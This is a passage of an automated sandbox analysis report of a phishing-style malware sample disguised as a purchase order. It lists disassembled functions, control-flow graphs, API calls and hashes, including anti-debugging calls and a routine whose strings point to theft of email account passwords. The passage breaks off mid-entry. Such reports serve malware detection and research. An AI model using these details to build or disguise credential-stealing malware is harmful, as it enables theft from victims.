                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: 8WB
                                                              • API String ID: 2295610775-3088156181
                                                              • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                              • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                              • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                              • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 382A61DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 382A61E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 382A61F1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 270c64320d4f39f9a0eea9c16076c6017e90459728378f55f6c96f92bf97a7af
                                                              • Instruction ID: 51d4e18e2d78eb954e3cf44abe14897f015c5691823f95012b75590905a26b30
                                                              • Opcode Fuzzy Hash: 270c64320d4f39f9a0eea9c16076c6017e90459728378f55f6c96f92bf97a7af
                                                              • Instruction Fuzzy Hash: 7C31C47494121DABCB21DF64D988B8DBBB8FF08310F5041DAE81CA7250EB749F958F45
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,382A4A8A,?,382B2238,0000000C,382A4BBD,00000000,00000000,?,382A2082,382B2108,0000000C,382A1F3A,?), ref: 382A4AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,382A4A8A,?,382B2238,0000000C,382A4BBD,00000000,00000000,?,382A2082,382B2108,0000000C,382A1F3A,?), ref: 382A4ADC
                                                              • ExitProcess.KERNEL32 ref: 382A4AEE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: fb9bf740c03d96ec02131b1552ebd93f576fe50ff75e91c67f81f2538b8e5f90
                                                              • Instruction ID: b8ef2e31b3d0368f29c85f98124189d0ff0caa912a9996ef7046af2d97d1899f
                                                              • Opcode Fuzzy Hash: fb9bf740c03d96ec02131b1552ebd93f576fe50ff75e91c67f81f2538b8e5f90
                                                              • Instruction Fuzzy Hash: 9DE0B63A000219AFCF016FA4CD9DA893FA9FF40385B514418FA459B521DF7DEA83CA58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: dc77f19a74b68227ed27b1775b40e1a0f4331b876d89d30bfa9ee9dc5e47c808
                                                              • Instruction ID: 0fe3779d8c8eb17c1deca892fe7ad98ba7f55a63cfad8761a9abf6ff711b8811
                                                              • Opcode Fuzzy Hash: dc77f19a74b68227ed27b1775b40e1a0f4331b876d89d30bfa9ee9dc5e47c808
                                                              • Instruction Fuzzy Hash: 7CA011302022028F83008EB08A0E20C3EECAA88380300822EAA08E0080EB38C0828A00

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 136 405373-40538e 137 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 136->137 138 40551d-405524 136->138 158 405479-40547c 137->158 159 40545d-405477 SendMessageW * 2 137->159 140 405526-405548 GetDlgItem CreateThread CloseHandle 138->140 141 40554e-40555b 138->141 140->141 143 405579-405583 141->143 144 40555d-405563 141->144 148 405585-40558b 143->148 149 4055d9-4055dd 143->149 146 405565-405574 ShowWindow * 2 call 4041cf 144->146 147 40559e-4055a7 call 404201 144->147 146->143 162 4055ac-4055b0 147->162 153 4055b3-4055c3 ShowWindow 148->153 154 40558d-405599 call 404173 148->154 149->147 151 4055df-4055e5 149->151 151->147 160 4055e7-4055fa SendMessageW 151->160 156 4055d3-4055d4 call 404173 153->156 157 4055c5-4055ce call 405234 153->157 154->147 156->149 157->156 165 40548c-4054a3 call 40419a 158->165 166 40547e-40548a SendMessageW 158->166 159->158 167 405600-40562b CreatePopupMenu call 405fae AppendMenuW 160->167 168 4056fc-4056fe 160->168 175 4054a5-4054b9 ShowWindow 165->175 176 4054d9-4054fa GetDlgItem SendMessageW 165->176 166->165 173 405640-405655 TrackPopupMenu 167->173 174 40562d-40563d GetWindowRect 167->174 168->162 173->168 178 40565b-405672 173->178 174->173 179 4054c8 175->179 180 4054bb-4054c6 ShowWindow 175->180 176->168 177 405500-405518 SendMessageW * 2 176->177 177->168 181 405677-405692 SendMessageW 178->181 182 4054ce-4054d4 call 4041cf 179->182 180->182 181->181 183 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 181->183 182->176 185 4056b9-4056e0 SendMessageW 183->185 185->185 186 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 185->186 186->168
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                              • GetClientRect.USER32(?,?), ref: 0040541D
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                              • ShowWindow.USER32(?,00000008), ref: 004054C0
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                              • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405548
                                                              • ShowWindow.USER32(00000000), ref: 0040556C
                                                              • ShowWindow.USER32(?,00000008), ref: 00405571
                                                              • ShowWindow.USER32(00000008), ref: 004055BB
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                              • CreatePopupMenu.USER32 ref: 00405600
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                              • GetWindowRect.USER32(?,?), ref: 00405634
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040564D
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                              • OpenClipboard.USER32(00000000), ref: 00405695
                                                              • EmptyClipboard.USER32 ref: 0040569B
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                              • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                              • CloseClipboard.USER32 ref: 004056F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {$&B
                                                              • API String ID: 590372296-2518801558
                                                              • Opcode ID: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                              • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                              • Opcode Fuzzy Hash: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                              • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 432 403cc2-403cd4 433 403e15-403e24 432->433 434 403cda-403ce0 432->434 436 403e73-403e88 433->436 437 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 433->437 434->433 435 403ce6-403cef 434->435 438 403cf1-403cfe SetWindowPos 435->438 439 403d04-403d07 435->439 441 403ec8-403ecd call 4041e6 436->441 442 403e8a-403e8d 436->442 437->436 438->439 444 403d21-403d27 439->444 445 403d09-403d1b ShowWindow 439->445 451 403ed2-403eed 441->451 447 403ec0-403ec2 442->447 448 403e8f-403e9a call 401389 442->448 452 403d43-403d46 444->452 453 403d29-403d3e DestroyWindow 444->453 445->444 447->441 450 404167 447->450 448->447 463 403e9c-403ebb SendMessageW 448->463 458 404169-404170 450->458 456 403ef6-403efc 451->456 457 403eef-403ef1 call 40140b 451->457 461 403d48-403d54 SetWindowLongW 452->461 462 403d59-403d5f 452->462 459 404144-40414a 453->459 466 403f02-403f0d 456->466 467 404125-40413e DestroyWindow EndDialog 456->467 457->456 459->450 464 40414c-404152 459->464 461->458 468 403e02-403e10 call 404201 462->468 469 403d65-403d76 GetDlgItem 462->469 463->458 464->450 473 404154-40415d ShowWindow 464->473 466->467 474 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 466->474 467->459 468->458 470 403d95-403d98 469->470 471 403d78-403d8f SendMessageW IsWindowEnabled 469->471 475 403d9a-403d9b 470->475 476 403d9d-403da0 470->476 471->450 471->470 473->450 502 403f62-403f67 474->502 503 403f6a-403fa6 ShowWindow EnableWindow call 4041bc EnableWindow 474->503 479 403dcb-403dd0 call 404173 475->479 480 403da2-403da8 476->480 481 403dae-403db3 476->481 479->468 483 403de9-403dfc SendMessageW 480->483 484 403daa-403dac 480->484 481->483 485 403db5-403dbb 481->485 483->468 484->479 488 403dd2-403ddb call 40140b 485->488 489 403dbd-403dc3 call 40140b 485->489 488->468 498 403ddd-403de7 488->498 500 403dc9 489->500 498->500 500->479 502->503 506 403fa8-403fa9 503->506 507 403fab 503->507 508 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 506->508 507->508 509 403ff0 508->509 510 403fdd-403fee SendMessageW 508->510 511 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 509->511 510->511 511->451 520 40403a-40403c 511->520 520->451 521 404042-404046 520->521 522 404065-404079 DestroyWindow 521->522 523 404048-40404e 521->523 522->459 525 40407f-4040ac CreateDialogParamW 522->525 523->450 524 404054-40405a 523->524 524->451 526 404060 524->526 525->459 527 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 525->527 526->450 527->450 532 40410b-404123 ShowWindow call 4041e6 527->532 532->459
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                              • ShowWindow.USER32(?), ref: 00403D1B
                                                              • DestroyWindow.USER32 ref: 00403D2F
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                              • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                              • GetDlgItem.USER32(?,?), ref: 00403E35
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                              • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                              • EnableWindow.USER32(?,?), ref: 00403F83
                                                              • EnableWindow.USER32(?,?), ref: 00403F9E
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                              • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                              • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                              • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                              • String ID: &B
                                                              • API String ID: 184305955-3208460036
                                                              • Opcode ID: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                              • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                              • Opcode Fuzzy Hash: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                              • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 535 40391f-403937 call 4062f6 538 403939-403949 call 405ed3 535->538 539 40394b-403982 call 405e59 535->539 547 4039a5-4039ce call 403bf5 call 405adf 538->547 543 403984-403995 call 405e59 539->543 544 40399a-4039a0 lstrcatW 539->544 543->544 544->547 553 403a60-403a68 call 405adf 547->553 554 4039d4-4039d9 547->554 560 403a76-403a9b LoadImageW 553->560 561 403a6a-403a71 call 405fae 553->561 554->553 555 4039df-403a07 call 405e59 554->555 555->553 564 403a09-403a0d 555->564 562 403b1c-403b24 call 40140b 560->562 563 403a9d-403acd RegisterClassW 560->563 561->560 578 403b26-403b29 562->578 579 403b2e-403b39 call 403bf5 562->579 566 403ad3-403b17 SystemParametersInfoW CreateWindowExW 563->566 567 403beb 563->567 569 403a1f-403a2b lstrlenW 564->569 570 403a0f-403a1c call 405a04 564->570 566->562 574 403bed-403bf4 567->574 571 403a53-403a5b call 4059d7 call 405f8c 569->571 572 403a2d-403a3b lstrcmpiW 569->572 570->569 571->553 572->571 577 403a3d-403a47 GetFileAttributesW 572->577 581 403a49-403a4b 577->581 582 403a4d-403a4e call 405a23 577->582 578->574 588 403bc2-403bca call 405307 579->588 589 403b3f-403b5c ShowWindow LoadLibraryW 579->589 581->571 581->582 582->571 596 403be4-403be6 call 40140b 588->596 597 403bcc-403bd2 588->597 591 403b65-403b77 GetClassInfoW 589->591 592 403b5e-403b63 LoadLibraryW 589->592 594 403b79-403b89 GetClassInfoW RegisterClassW 591->594 595 403b8f-403bc0 DialogBoxParamW call 40140b call 40386f 591->595 592->591 594->595 595->574 596->567 597->578 600 403bd8-403bdf call 40140b 597->600 600->578
                                                              APIs
                                                                • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                              • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,75573420,00000000,00434000), ref: 004039A0
                                                              • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                              • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                              • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                              • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                              • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                              • API String ID: 914957316-1918744475
                                                              • Opcode ID: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                              • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                              • Opcode Fuzzy Hash: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                              • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 606 404337-404349 607 404469-404476 606->607 608 40434f-404357 606->608 609 4044d3-4044d7 607->609 610 404478-404481 607->610 611 404359-404368 608->611 612 40436a-40438e 608->612 617 4045a5-4045ac 609->617 618 4044dd-4044f5 GetDlgItem 609->618 613 4045b4 610->613 614 404487-40448d 610->614 611->612 615 404390 612->615 616 404397-404412 call 40419a * 2 CheckDlgButton call 4041bc GetDlgItem call 4041cf SendMessageW 612->616 624 4045b7-4045be call 404201 613->624 614->613 621 404493-40449e 614->621 615->616 646 404414-404417 GetSysColor 616->646 647 40441d-404464 SendMessageW * 2 lstrlenW SendMessageW * 2 616->647 617->613 622 4045ae 617->622 619 404566-40456d 618->619 620 4044f7-4044fe 618->620 619->624 626 40456f-404576 619->626 620->619 625 404500-40451b 620->625 621->613 627 4044a4-4044ce GetDlgItem SendMessageW call 4041bc call 4045ca 621->627 622->613 634 4045c3-4045c7 624->634 625->619 630 40451d-404563 SendMessageW LoadCursorW SetCursor ShellExecuteW LoadCursorW SetCursor 625->630 626->624 631 404578-40457c 626->631 627->609 630->619 635 40458e-404592 631->635 636 40457e-40458c SendMessageW 631->636 640 4045a0-4045a3 635->640 641 404594-40459e SendMessageW 635->641 636->635 640->634 641->640 646->647 647->634
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                              • GetSysColor.USER32(?), ref: 00404417
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                              • lstrlenW.KERNEL32(?), ref: 00404438
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                              • SendMessageW.USER32(00000000), ref: 004044BA
                                                              • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                              • SetCursor.USER32(00000000), ref: 00404539
                                                              • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                              • SetCursor.USER32(00000000), ref: 0040455D
                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                              • String ID: N$open
                                                              • API String ID: 3615053054-904208323
                                                              • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                              • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                              • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                              • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 648 382a173a-382a17fe call 382ac030 call 382a2c40 * 2 655 382a1803 call 382a1cca 648->655 656 382a1808-382a180c 655->656 657 382a19ad-382a19b1 656->657 658 382a1812-382a1816 656->658 658->657 659 382a181c-382a1837 call 382a1ede 658->659 662 382a199f-382a19ac call 382a1ee7 * 2 659->662 663 382a183d-382a1845 659->663 662->657 664 382a184b-382a184e 663->664 665 382a1982-382a1985 663->665 664->665 667 382a1854-382a1881 call 382a44b0 * 2 call 382a1db7 664->667 669 382a1987 665->669 670 382a1995-382a1999 665->670 682 382a193d-382a1943 667->682 683 382a1887-382a189f call 382a44b0 call 382a1db7 667->683 671 382a198a-382a198d call 382a2c40 669->671 670->662 670->663 677 382a1992 671->677 677->670 684 382a197e-382a1980 682->684 685 382a1945-382a1947 682->685 683->682 699 382a18a5-382a18a8 683->699 684->671 685->684 687 382a1949-382a194b 685->687 689 382a194d-382a194f 687->689 690 382a1961-382a197c call 382a16aa 687->690 692 382a1951-382a1953 689->692 693 382a1955-382a1957 689->693 690->677 692->690 692->693 696 382a1959-382a195b 693->696 697 382a195d-382a195f 693->697 696->690 696->697 697->684 697->690 700 382a18aa-382a18c2 call 382a44b0 call 382a1db7 699->700 701 382a18c4-382a18dc call 382a44b0 call 382a1db7 699->701 700->701 710 382a18e2-382a193b call 382a16aa call 382a15da call 382a2c40 * 2 700->710 701->670 701->710 710->670
                                                              APIs
                                                                • Part of subcall function 382A1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D1B
                                                                • Part of subcall function 382A1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 382A1D37
                                                                • Part of subcall function 382A1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D4B
                                                              • _strlen.LIBCMT ref: 382A1855
                                                              • _strlen.LIBCMT ref: 382A1869
                                                              • _strlen.LIBCMT ref: 382A188B
                                                              • _strlen.LIBCMT ref: 382A18AE
                                                              • _strlen.LIBCMT ref: 382A18C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: 10a58b4e7b3eb3dd6cd7a67c567b5fb1cf561d945f375130f3b3abb5e6931eb5
